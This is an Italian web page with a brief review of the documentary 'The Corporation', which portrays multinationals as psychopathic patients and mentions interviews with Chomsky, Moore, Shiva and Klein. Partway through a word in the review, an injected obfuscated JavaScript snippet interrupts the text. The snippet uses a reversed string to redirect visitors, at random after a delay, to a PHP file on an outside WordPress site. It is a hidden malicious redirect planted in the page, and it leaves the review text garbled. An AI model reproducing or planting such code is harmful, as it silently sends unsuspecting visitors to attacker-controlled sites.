Malate di potere

image_pdfimage_print

“The Corporation” è un documentario sulla nascita, il consolidamento e lo sviluppo delle multinazionali dalla rivoluzione industriale a oggi. Il film analizza in modo critico ma al tempo stesso divertente la crescita esponenziale di questa istituzione il cui scopo è solo quello di fare profitti. Gioc (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando sulle parole, visto che le multinazionali sono “persone giuridiche”, vengono analizzate da un punto di vista medico secondo i criteri condivisi dall’Organizzazione Mondiale della Sanità. Tutti i sintomi portano a considerarle un paziente psicotico: disinteressato ai sentimenti e incurante della sicurezza altrui, disonesto, incapace di provare rimorso e di mantenere relazioni stabili.
Dopo una prima parte in cui le multinazionali appaiono quasi invincibili, il film sottolinea la capacità della società civile di ottenere vittorie concrete. L’analisi offerta è corredata da interventi di Noam Chomsky, Michael Moore, Vandana Shiva, Naomi Klein, oltre che da personaggi che detengono le leve del potere delle aziende in questione. (a.m.)

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *